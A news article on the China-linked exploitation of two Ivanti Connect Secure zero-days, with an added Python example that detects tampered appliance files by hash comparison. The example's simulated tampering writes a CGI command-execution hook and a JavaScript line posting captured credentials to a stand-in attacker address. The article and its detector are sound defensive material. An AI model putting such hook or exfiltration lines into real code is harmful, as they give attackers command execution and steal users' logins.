Ivanti Connect Secure (ICS) and Ivanti Policy Secure have been targeted in a cyber-attack attributed to suspected China-linked nation-state actors.
Volexity identified the activity in the second week of December 2023 and attributes it to a group it tracks as UTA0178. The group exploited a pair of zero-day vulnerabilities; fewer than 10 customers are known to have been compromised.
The vulnerabilities, CVE-2023-46805 and CVE-2024-21887, together allowed unauthenticated command execution on ICS devices. CVE-2023-46805 is an authentication bypass in the web component that grants remote access to otherwise restricted resources. CVE-2024-21887 is a command injection flaw that lets an authenticated administrator execute arbitrary commands on the appliance.
Chained, the two form a potent combination: the bypass removes the authentication requirement that the command injection would otherwise impose, so a threat actor needs no credentials to run commands on the device. Ivanti also reported attempts by the attackers to tamper with its internal Integrity Checker Tool (ICT), which underlines the severity of the intrusion. A checker that runs on the appliance it is checking can be subverted along with that appliance, so integrity results should be obtained from a trusted copy run outside the device and corroborated with out-of-band evidence such as network telemetry.
Ivanti has said that patches will be released on a staggered schedule starting the week of January 22, 2024. Until a patch is available for their version, customers are strongly advised to apply Ivanti's published interim mitigation.
Volexity's analysis found that the attackers used the two flaws to steal configuration data, modify files, download remote files, and establish reverse tunnels from the ICS VPN appliance. Notably, they altered a legitimate CGI file and a JavaScript file on the device to gain command execution, log keystrokes, and exfiltrate user credentials.
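The attackers' changes to a legitimate CGI file and a JavaScript file are exactly what an off-box integrity check is meant to catch. The following is an added example written for this article, not code from Ivanti, Volexity, or the article itself: it builds a SHA-256 manifest of an appliance's web root, stores it (in a real deployment: off the device, and signed), and later diffs the live tree against it. The directory layout, file names, contents and the exfiltration address are constructed to simulate the intrusion described above.

```python
"""
Added example (not from the article or from Ivanti/Volexity): an
off-box integrity check of the kind an integrity checker tool performs.
Because the attackers modified a legitimate CGI file and a JavaScript
file and tried to tamper with the on-device checker, the baseline
manifest and the comparison should live where the appliance cannot
rewrite them. All paths and contents below are constructed.
"""
import hashlib
import tempfile
from pathlib import Path


def sha256_file(path: Path) -> str:
    """Return the hex SHA-256 of a file, read in 64 KiB chunks."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root: Path) -> dict[str, str]:
    """Map every regular file under root (relative POSIX path) to its hash."""
    manifest = {}
    for p in sorted(root.rglob("*")):
        if p.is_file():
            manifest[p.relative_to(root).as_posix()] = sha256_file(p)
    return manifest


def compare(baseline: dict[str, str], current: dict[str, str]) -> dict[str, list[str]]:
    """Diff two manifests. 'added' matters as much as 'modified': a dropped
    web shell is a new file, a backdoored CGI is a changed one."""
    return {
        "modified": sorted(f for f in baseline if f in current and baseline[f] != current[f]),
        "added": sorted(f for f in current if f not in baseline),
        "removed": sorted(f for f in baseline if f not in current),
    }


def demo() -> dict[str, list[str]]:
    """Constructed scenario: take a baseline, then tamper with the tree the
    way the intrusion described in the article did, and report the diff."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "cgi-bin").mkdir()
        (root / "js").mkdir()
        (root / "cgi-bin" / "status.cgi").write_text("#!/usr/bin/perl\nprint 'ok';\n")
        (root / "js" / "login.js").write_text(
            "function login(u, p) { post('/login', {u: u, p: p}); }\n"
        )
        baseline = build_manifest(root)  # in practice: stored off-box and signed

        # Simulated tampering (constructed): a command-execution hook in the
        # CGI, credential capture appended to the login script, and a new
        # file dropped alongside. 203.0.113.10 is a documentation address.
        (root / "cgi-bin" / "status.cgi").write_text(
            "#!/usr/bin/perl\nsystem($ENV{'HTTP_X_CMD'});\nprint 'ok';\n"
        )
        with (root / "js" / "login.js").open("a") as f:
            f.write("fetch('https://203.0.113.10/c', {method: 'POST', body: u + ':' + p});\n")
        (root / "cgi-bin" / "shell.cgi").write_text("# constructed web shell placeholder\n")

        return compare(baseline, build_manifest(root))


if __name__ == "__main__":
    for kind, files in demo().items():
        print(f"{kind}: {files}")
```

The comparison is only as trustworthy as the baseline and the machine running it: if the manifest is generated or consumed on a device an attacker already controls, the attacker can regenerate it after tampering, which is the failure mode the ICT manipulation attempts in this incident were aiming at.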
The severity of the situation prompted the U.S. Cybersecurity and Infrastructure Security Agency (CISA) to add the vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog. Federal agencies are urged to apply fixes by January 31, 2024.
Volexity stressed the growing threat to internet-facing systems, particularly edge devices such as VPN appliances and firewalls. These devices are attractive targets because they sit at the network perimeter with trusted access inward and generally cannot host endpoint detection agents, so detection depends on appliance logs, integrity checks, and network telemetry. Organizations that operate them need robust monitoring and a rapid response process for exactly this class of incident.